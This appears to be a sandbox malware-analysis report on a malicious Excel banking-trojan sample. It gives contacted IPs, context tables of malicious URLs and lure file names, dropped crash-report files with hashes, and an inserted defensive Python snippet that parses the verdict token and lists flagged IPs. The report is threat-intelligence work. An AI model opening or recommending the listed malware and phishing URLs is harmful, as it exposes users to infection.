Classification: mal100.bank.troj.spyw.expl.evad.winXLS@19/52@10/5
EGA Information:
• Successful, ratio: 100%
HDC Information:
• Successful, ratio: 56.7% (good quality ratio 54.1%)
• Quality average: 82.5%
• Quality standard deviation: 26.6%
HCA Information:
• Successful, ratio: 88%
• Number of executed functions: 154
• Number of non-executed functions: 74
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .xls
• Changed system and user locale, location and keyboard layout to English - United States
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, ielowutil.exe, wermgr.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.42.23, 52.109.32.27, 52.109.12.20, 51.143.111.7, 2.18.104.47, 152.199.19.161, 23.39.87.170
• Excluded domains from analysis (whitelisted): umwatson.trafficmanager.net, config.edge.skype.com.trafficmanager.net, ie9comview.vo.msecnd.net, prod.configsvc1.live.com.akadns.net, config-edge-skype.l-0014.l-msedge.net, prod.nexusrules.live.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, config.officeapps.live.com, go.microsoft.com.edgekey.net, l-0014.l-msedge.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, config.edge.skype.com, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net, cs9.wpc.v0cdn.net
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtOpenFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
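The classification token above packs the verdict, score, behaviour tags, platform/file type and four counters into one string, and the Contacted IPs table mixes hosts the report flags as malicious with one it does not (54.225.191.113, the Amazon address that the context tables further down associate with api.ipify.org, a public IP-lookup service rather than a C2). The following Python is an added example, not part of the Joe Sandbox report or its tooling: it decodes the token and pulls out only the IPs the report marks malicious, the set an analyst would actually hand to a blocklist. Reading the two "@a/b" counter pairs as processes/dropped files and domains/IPs is an assumption; the only value verifiable from this section is the final counter, 5, which matches the five public IPs listed.

```python
import re
from dataclasses import dataclass

# Classification string copied from the General Information table of this report.
CLASSIFICATION = "mal100.bank.troj.spyw.expl.evad.winXLS@19/52@10/5"

# Contacted IPs table copied from the report: (ip, country, asn, asn_name, malicious).
# ASN names are kept exactly as the report prints them.
CONTACTED_IPS = [
    ("8.208.80.226", "Singapore", 45102, "CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC", True),
    ("54.225.191.113", "United States", 14618, "AMAZON-AESUS", False),
    ("5.101.51.247", "Russian Federation", 49505, "SELECTELRU", True),
    ("91.218.231.226", "Russian Federation", 203226, "IHCRUInternet-HostingLtdMoscowRussiaRU", True),
    ("185.206.163.136", "Germany", 47583, "AS-HOSTINGERLT", True),
]

# Layout: <verdict><score>[.<tag>...].<platform><FILETYPE>@<a>/<b>@<c>/<d>
# Tags are lower-case dotted tokens; the file type is the upper-case tail of the last token.
_CLASS_RE = re.compile(
    r"^(?P<verdict>[a-z]+)(?P<score>\d+)"
    r"(?:\.(?P<tags>[a-z]+(?:\.[a-z]+)*))?"
    r"\.(?P<platform>[a-z]+)(?P<filetype>[A-Z0-9]+)"
    r"@(?P<a>\d+)/(?P<b>\d+)@(?P<c>\d+)/(?P<d>\d+)$"
)


@dataclass
class Classification:
    verdict: str        # "mal", "clean", ...
    score: int          # 0-100
    tags: list          # behaviour tags, e.g. bank, troj, spyw, expl, evad
    platform: str       # "win"
    filetype: str       # "XLS"
    processes: int      # assumed meaning of the first counter pair (a/b)
    dropped_files: int
    domains: int        # assumed meaning of the second counter pair (c/d)
    ips: int


def parse_classification(s: str) -> Classification:
    """Decode a Joe Sandbox classification token; raise on anything that does not fit the layout."""
    m = _CLASS_RE.match(s.strip())
    if m is None:
        raise ValueError(f"unrecognised classification string: {s!r}")
    tags = m["tags"].split(".") if m["tags"] else []
    return Classification(
        m["verdict"], int(m["score"]), tags, m["platform"], m["filetype"],
        int(m["a"]), int(m["b"]), int(m["c"]), int(m["d"]),
    )


def malicious_ips(rows):
    """Map each IP the report flags as malicious to its (asn, asn_name); unflagged rows are dropped."""
    return {ip: (asn, name) for ip, _country, asn, name, flagged in rows if flagged}


def counters_consistent(cls: Classification, rows) -> bool:
    """The IP counter in the token should equal the number of contacted public IPs listed."""
    return cls.ips == len(rows)


if __name__ == "__main__":
    c = parse_classification(CLASSIFICATION)
    print(c)
    print("block these:", sorted(malicious_ips(CONTACTED_IPS)))
    print("counter matches table:", counters_consistent(c, CONTACTED_IPS))
```

The benign Amazon host is deliberately left out of the blocklist: blocking an IP-lookup service's load balancer would only break legitimate software, and the indicator that matters for this sample is the use of such a service at all, which the context tables record.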

Signature Similarity

Sample Distance (10 = nearest): no similar samples listed (Samplename / Analysis ID / SHA256 / Similarity table is empty).

Simulations

Behavior and APIs

Time | Type | Description
11:20:46 | API Interceptor | 424x Sleep call for process: svchost.exe modified

Joe Sandbox View / Context

IPs

Match | Associated Sample Name / URL | Detection | Context
8.208.80.226 | look_presentation#_94875.vbs | malicious | 
54.225.191.113 | jdruBkJUZi.exe | malicious | api.ipify.org/
54.225.191.113 | DHL_AWB#Tracking.exe | malicious | api.ipify.org/

Domains

Match | Associated Sample Name / URL | Detection | Context
elb097307-934924932.us-east-1.elb.amazonaws.com | 58afNmgh8T.exe | malicious | 174.129.214.20
elb097307-934924932.us-east-1.elb.amazonaws.com | 58afNmgh8T.exe | malicious | 107.22.251.25
elb097307-934924932.us-east-1.elb.amazonaws.com | jdruBkJUZi.exe | malicious | 54.221.234.156
elb097307-934924932.us-east-1.elb.amazonaws.com | jdruBkJUZi.exe | malicious | 23.21.153.210
elb097307-934924932.us-east-1.elb.amazonaws.com | jdruBkJUZi.exe | malicious | 54.225.191.113
elb097307-934924932.us-east-1.elb.amazonaws.com | https://extranettoulouse.creatorlink.net/ | malicious | 107.22.251.25
elb097307-934924932.us-east-1.elb.amazonaws.com | Swift reciept.exe | malicious | 54.225.66.103
elb097307-934924932.us-east-1.elb.amazonaws.com | XiIz4Xklvc.exe | malicious | 184.73.165.106
elb097307-934924932.us-east-1.elb.amazonaws.com | https://www.notism.io/-/07ace71cc299025c9a5905bb5 | malicious | 54.225.66.103
elb097307-934924932.us-east-1.elb.amazonaws.com | G92gUs1DwA.exe | malicious | 107.22.188.116
elb097307-934924932.us-east-1.elb.amazonaws.com | 8V8p4Yq5Vo.zip | malicious | 174.129.214.20
elb097307-934924932.us-east-1.elb.amazonaws.com | 0wligr5b.wlo.exe | malicious | 54.243.162.249
elb097307-934924932.us-east-1.elb.amazonaws.com | 0wligr5b.wlo.exe | malicious | 184.73.165.106
elb097307-934924932.us-east-1.elb.amazonaws.com | 0wligr5b.wlo.exe | malicious | 107.22.251.25
elb097307-934924932.us-east-1.elb.amazonaws.com | 0wligr5b.wlo.exe | malicious | 204.236.231.159
elb097307-934924932.us-east-1.elb.amazonaws.com | 0wligr5b.wlo.exe | malicious | 23.21.153.210
elb097307-934924932.us-east-1.elb.amazonaws.com | 0wligr5b.wlo.exe | malicious | 23.21.153.210
elb097307-934924932.us-east-1.elb.amazonaws.com | RFQ12OK_pdf.exe | malicious | 54.243.162.249
elb097307-934924932.us-east-1.elb.amazonaws.com | AMG-017-PR-2020.exe | malicious | 54.225.182.172
elb097307-934924932.us-east-1.elb.amazonaws.com | https://api.ipify.org/?format=jsonp&callback=jQuery11120609716424699766_1591636053741&_=1591636053742 | malicious | 54.225.178.192

ASN

Match | Associated Sample Name / URL | Detection | Context
AS-HOSTINGERLT | http://wingfitech.com/images/scotia/redirect.html | malicious | 194.59.164.65
AS-HOSTINGERLT | setup.exe | malicious | 141.136.36.13
SELECTELRU | Invoice_810676_Inc.xlsm | malicious | 84.38.183.228
SELECTELRU | Office 365 32802.xlsm | malicious | 84.38.183.228
SELECTELRU | http://95.213.165.45 | malicious | 95.213.165.45
SELECTELRU | Channa_Reba.xls | malicious | 31.184.253.146
SELECTELRU | 87856575-55.xlsm | malicious | 84.38.183.114
SELECTELRU | 87856575-55.xlsm | malicious | 84.38.183.114
SELECTELRU | 54012904-31.xlsm | malicious | 84.38.183.114
SELECTELRU | #RFQ ANN36151207.xlsx | malicious | 84.38.183.37
SELECTELRU | AWB191598404745.xlsm | malicious | 84.38.183.114
SELECTELRU | http://nabudore.top/jojo684/39f744.php | malicious | 84.38.181.209
SELECTELRU | AWB 770568604827.xlsm | malicious | 84.38.183.237
SELECTELRU | favicon.dll | malicious | 31.184.253.171
SELECTELRU | INV_4540_80467.xlsm | malicious | 188.68.221.14
SELECTELRU | PAY700593006193318.doc | malicious | 91.217.9.187
SELECTELRU | PAY700593006193318.doc | malicious | 91.217.9.187
SELECTELRU | C_ACH_02042019.xlsm | malicious | 80.93.177.126
SELECTELRU | http://svai-nkt.ru/En/corporation/Invoice_number/jQxe-VGfy_PVswUKb-ZLx | malicious | 91.217.9.187
SELECTELRU | Payment_Doc_5136168.doc | malicious | 80.93.177.126
SELECTELRU | http://87.117.235.116 | malicious | 95.213.215.205
SELECTELRU | mswvc.exe | malicious | 82.202.212.162
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://k2scz.info/EZjs5k30wx | malicious | 8.210.166.202
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://tipsandtricks.specialtopics.website/key/ypxqla | malicious | 8.208.23.225
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://www.tuckerdefense.com | malicious | 198.11.136.82
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | http://look.healthcaretopic.club/flm/epv7 | malicious | 8.208.23.225
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://www.superbirkin.com/wp-content/plugins/uhnwseo/remittance.jar | malicious | 161.117.3.122
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Payment.135.xls | malicious | 47.57.165.162
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Payment.135.xls | malicious | 47.57.165.162
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://smipsdarnay.com/394-20200707-10-DELAW.jar | malicious | 47.91.114.92
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | order59.xls | malicious | 47.57.165.162
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | order59.xls | malicious | 47.57.165.162
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | https://delawhub.com/ | malicious | 47.91.114.92
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | look_presentation#_94875.vbs | malicious | 8.208.80.226
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | in910.xls | malicious | 47.57.165.162
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Qt.961.xls | malicious | 47.57.165.162
CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | Qt.961.xls | malicious | 
                                                                                                                                      • 47.57.165.162
                                                                                                                                      order.652.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      order.652.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.57.165.162
                                                                                                                                      presentation#_48406.vbsGet hashmaliciousBrowse
                                                                                                                                      • 8.210.127.177
                                                                                                                                      presentation#_48406.vbsGet hashmaliciousBrowse
                                                                                                                                      • 8.210.127.177
                                                                                                                                      664385.xlsGet hashmaliciousBrowse
                                                                                                                                      • 47.254.124.187
                                                                                                                                      AMAZON-AESUShttp://securemsg.bankofamerica.com/pe.htmlGet hashmaliciousBrowse
                                                                                                                                      • 52.86.34.117
                                                                                                                                      33#U0443.exeGet hashmaliciousBrowse
                                                                                                                                      • 35.172.94.1
                                                                                                                                      http://rebrand.ly/y41stxiGet hashmaliciousBrowse
                                                                                                                                      • 3.214.100.252
                                                                                                                                      http://bit.do/fGuK9Get hashmaliciousBrowse
                                                                                                                                      • 54.83.52.76
                                                                                                                                      BLUNT1040RET18.docGet hashmaliciousBrowse
                                                                                                                                      • 52.55.47.113
                                                                                                                                      https://www.dropbox.com/l/AAA89lBj6MiBhOeQQ6Lru61-FzuMJlwCLCYGet hashmaliciousBrowse
                                                                                                                                      • 34.234.126.38
                                                                                                                                      http://bit.do/fGyE2Get hashmaliciousBrowse
                                                                                                                                      • 54.83.52.76
                                                                                                                                      https://bootsonagmvhhy.storage.googleapis.com/bootsizitvhjeo.html#qs=r-abacaecgjgkeacaefbicababacagbacfcaccakjbackbfahebejacbGet hashmaliciousBrowse
                                                                                                                                      • 54.164.243.243
                                                                                                                                      19 extension.docGet hashmaliciousBrowse
                                                                                                                                      • 52.207.6.131
                                                                                                                                      http://www.tuckerdefense.comGet hashmaliciousBrowse
                                                                                                                                      • 34.194.120.148
                                                                                                                                      https://61a5aa08df524631b9d45ec6593f6d8a.svc.dynamics.com/t/r/glCS8jZ5Wwi19P7HTuz0GDRKU_8MAPkSd3XMmUyIAx0#jerrym@dwotc.com:dY9R89300-2383474993878ud=388cKp0FyZm_xcLaGa5Gig947783+trackid3cKp0FyZm_xcLaGa5Gig893Get hashmaliciousBrowse
                                                                                                                                      • 184.73.212.164
                                                                                                                                      58afNmgh8T.exeGet hashmaliciousBrowse
                                                                                                                                      • 174.129.214.20
                                                                                                                                      58afNmgh8T.exeGet hashmaliciousBrowse
                                                                                                                                      • 107.22.251.25
                                                                                                                                      http://wyoutube.comGet hashmaliciousBrowse
                                                                                                                                      • 54.235.212.68
                                                                                                                                      http://email.extrahoteldeals.com/c/eJwdj8FuwyAQRL_GHNF6CTF74JC47W9UawwyKQku0NT5-6JKoxnpnd6s1qDXIKJFQIAJCAwYJDnKy7sxM15hVhPB-IbDCfzRCm-5-bR6TlW6fBebBWAcYdEEEJbFKFwcEyAHZfT5pEDcLWpNZ00i2a21vQ7qMuBHD4cQU-TmJbuSa5WxdfrEXi5F99X3hvvxg4_wooNI_96m76colh9r8Sw35uq7GB97_rdpdi6vveXPfmRC-ANtxELEGet hashmaliciousBrowse
                                                                                                                                      • 54.157.235.0
                                                                                                                                      newageGet hashmaliciousBrowse
                                                                                                                                      • 44.218.149.149
                                                                                                                                      Mrm6c2mSIS.apkGet hashmaliciousBrowse
                                                                                                                                      • 54.164.41.106
                                                                                                                                      http://www.timesindonesia.co.idGet hashmaliciousBrowse
                                                                                                                                      • 54.86.112.34
                                                                                                                                      http://crimoaogameizox.frb.io/Get hashmaliciousBrowse
                                                                                                                                      • 3.91.190.61
                                                                                                                                      EDVqSO7OAuGet hashmaliciousBrowse
                                                                                                                                      • 54.164.41.106

JA3 Fingerprints

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_regsvr32.exe_47d3cca66b7677c2576542e98787a2eddb86d_7a325c51_02a47bf4\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Size (bytes): 11468
Entropy (8bit): 3.7725105294543613
Encrypted: false
MD5: D02450764557F842F1779A6DCE8352B3
SHA1: 2C152F6CF5E28C73E083D048808AC31FB1A45CB1
SHA-256: E623B0BBD1D720EBADB4B3310CE8E3141491DCF498154B05EE24B4813C53AA6C
SHA-512: 964A2B6AD997FD6B0DC0486F95BAFAD14E756EB16F4C8B22C1FF77F5A01C066E2C5A4E4A4171FD2EC24CA90EB3A4A86A4E664E6164AFB2C4505B39DC00CBF921
Malicious: false
Reputation: low
                                                                                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.3.9.1.9.2.0.4.4.9.3.4.8.1.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.6.1.1.b.5.3.7.-.b.3.5.8.-.4.8.0.2.-.a.a.0.2.-.7.e.3.b.a.a.9.b.4.7.0.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.9.8.9.5.b.2.9.-.9.4.4.3.-.4.e.6.7.-.b.d.6.5.-.4.a.5.a.c.4.d.b.f.1.2.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.e.g.s.v.r.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.E.G.S.V.R.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.3.3.0.-.0.0.0.1.-.0.0.2.2.-.3.f.a.d.-.3.6.0.2.c.0.5.9.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.6.3.0.f.6.0.e.7.3.4.5.4.6.7.0.a.7.d.9.b.6.4.c.9.8.b.4.7.9.8.d.1.d.e.8.8.7.2.!.r.e.g.s.v.r.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.1././.0.4././.0.9.:.1.7.:.2.8.:.2.3.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A03.tmp.dmp
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Mini DuMP crash report, 15 streams, Tue Jul 14 09:20:46 2020, 0x1205a4 type
Size (bytes): 46890
Entropy (8bit): 2.224196287060662
Encrypted: false
MD5: ED62F6AF52E6DAEE2F855DB8F62270B6
SHA1: C9F6F5C438B9F3AD421C0BA183CDBFCE7C251A76
SHA-256: A881AC88B55CEBC27D2E1D559F38E16331B1EE49A61E2E04221C29BAC16570E3
SHA-512: 0DBE5842A2A0B65034E317EBC8330F8CEDC120DA931C89E330C6D01ED7A96EA026CCF050A763C57F37D03649757185BEBC01A61C11AFE282CB405DEC63289DE5
Malicious: false
Reputation: low
                                                                                                                                      Preview: MDMP....... ........x._...................?...........B..............GenuineIntel............T.......0....x._........`...`...`............0..=...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
C:\ProgramData\Microsoft\Windows\WER\Temp\WER728F.tmp.WERInternalMetadata.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Size (bytes): 8282
Entropy (8bit): 3.6945505321229093
Encrypted: false
MD5: AAC9A3A4BAE19621C3A93B7C120E6191
SHA1: B2F0BDDC4F7E01C9C266025E9056BFA9C5021DAC
SHA-256: F878233D93B7121F10F2DA8A0D06FE7C28CD89EED9A6E21F777C73E986637C65
SHA-512: CC4562A56F57F22442C60865663721B73FD4E33411CD70B83E6BEDADC4D96350FC2F68844C9E8469E3542DE01EBE82C370AE5041CD4D51F888E68CBA6717CA38
Malicious: false
Reputation: low
                                                                                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1.6.5...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.9.1.2.<./.P.i.d.
C:\ProgramData\Microsoft\Windows\WER\Temp\WER754F.tmp.xml
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Size (bytes): 4580
Entropy (8bit): 4.454707659708491
Encrypted: false
MD5: 6B9B7718D4E89C70E6E750AEEA917F5A
SHA1: A7930AF9995DD7998F04AA7DAC106E482E2D478C
SHA-256: 4B0327B672F33CA79725CDFADFD517AFF5819FDBA48D4E4B4294644C9DA1244D
SHA-512: 411A1AA8BC6C63FC09B72911D085B46A99ECE838B99873E3B39A104A8501BC23F133FECFBA8C520AB9A9A2ACAD42D57C94EC49F4B0411A2C6C534267118F2012
Malicious: false
Reputation: low
                                                                                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="165" />.. <arg nm="verqfe" val="165" />.. <arg nm="csdbld" val="165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1055537" />.. <arg nm="osinsty" val="2" />.. <arg nm="iever" val="11.165.17134.0-11.0.75" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="2048" /
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5D34F2B4-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):29272
                                                                                                                                      Entropy (8bit):1.7736014006042586
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:5882C228F69C0E3A640099AD0B5FADDF
                                                                                                                                      SHA1:3CD821481936CC08D8C72282A46D53739EE8D770
                                                                                                                                      SHA-256:15FDA38496639879F7BE3F22840D21F7268B4A0F838CCF6E04924304F22C078A
                                                                                                                                      SHA-512:56220F8FDCD116C145903EF5781D0AA0F47221253891494C561FB0F4FC42875EE70E9A53F5BF99CA50C7AB7BC04A4D93044C3FB6EFD1FACE7E6434B38BEADF85
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{79DD1811-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):29272
                                                                                                                                      Entropy (8bit):1.7658380358999521
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:2BDDB9F4548C89A4FB32C33FAC351E1A
                                                                                                                                      SHA1:DAACC60B608E4E569F973019E7DBBE5760CC063C
                                                                                                                                      SHA-256:E8F550CD93405FC643D9AC11663B1A621544BC4F67B61A9F0F5991A8ED71BEC2
                                                                                                                                      SHA-512:62AD7FAEF2528CB6035B10F83A1AD1B5BC5DE4E205717EE4F75176607DFC24127BD449F576D8707BC3F57AF729DE31FB2B39CD578132195123BBFD6A707AE371
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{5D34F2B6-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):28120
                                                                                                                                      Entropy (8bit):1.9101130513941005
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:14F2C29F304421FA3F7A5FA44A585C80
                                                                                                                                      SHA1:7382E00CACFEF8D853B7415B442EF4FCBDE9EC29
                                                                                                                                      SHA-256:79B0B4C45689589F26E60C8CEF9DA06C2DBD9CA72C235BFEE91D98F4D0791C3B
                                                                                                                                      SHA-512:EEC40F5FBAF80DA799C55088C5A009FF675E41AAB82308E4AE0B671E8AC24B736C40185EE66F0F3715A7BB01154FA4F5317C86A287EE61D87E1B4798C8CDF94F
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{79DD1813-C5B3-11EA-AAE4-C2DD1F0DAA95}.dat
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:Microsoft Word Document
                                                                                                                                      Size (bytes):28120
                                                                                                                                      Entropy (8bit):1.9088155571000063
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:F9ACF5241FDA37B1751C82F913AE774E
                                                                                                                                      SHA1:C9733F3551035666AA8EB67E976CC9BBD33FF1A8
                                                                                                                                      SHA-256:B2B32AAF89619EEF2F763D8DA023D1E4295C49F3B1EB012FA2A57669895BD9A9
                                                                                                                                      SHA-512:5EFD6D7E5FFF8A7410F2A947E66D7A56FE9490A3CB6749E13156F107D0C2886423E88321F5B10FF69D9353BCB65CD467ECFD88B0677A4DD054DAA8A43E75891B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                      Size (bytes):655
                                                                                                                                      Entropy (8bit):5.058843118064778
                                                                                                                                      Encrypted:false
                                                                                                                                      MD5:85C0F4466155B5FB3DCA6DA47573BD56
                                                                                                                                      SHA1:DA240E516B0C4C890206EB878916CEDF8147660A
                                                                                                                                      SHA-256:04E6FD05B2D3607CC9946569E48E11455523F7ECD2D1F566AB0882E1A0CCD7DB
                                                                                                                                      SHA-512:FCB1B771F18543B6B43CA740AD38E33FF1A5DC502C8826C6C7A46DFDAA48ECC81AC73BCCC77E0B26A90072E736A21A18F167742D30AF8786A6E5FD8800B8B3BE
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x353eafea,0x01d659c0</date><accdate>0x353eafea,0x01d659c0</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                                                                                                                      Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                      File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
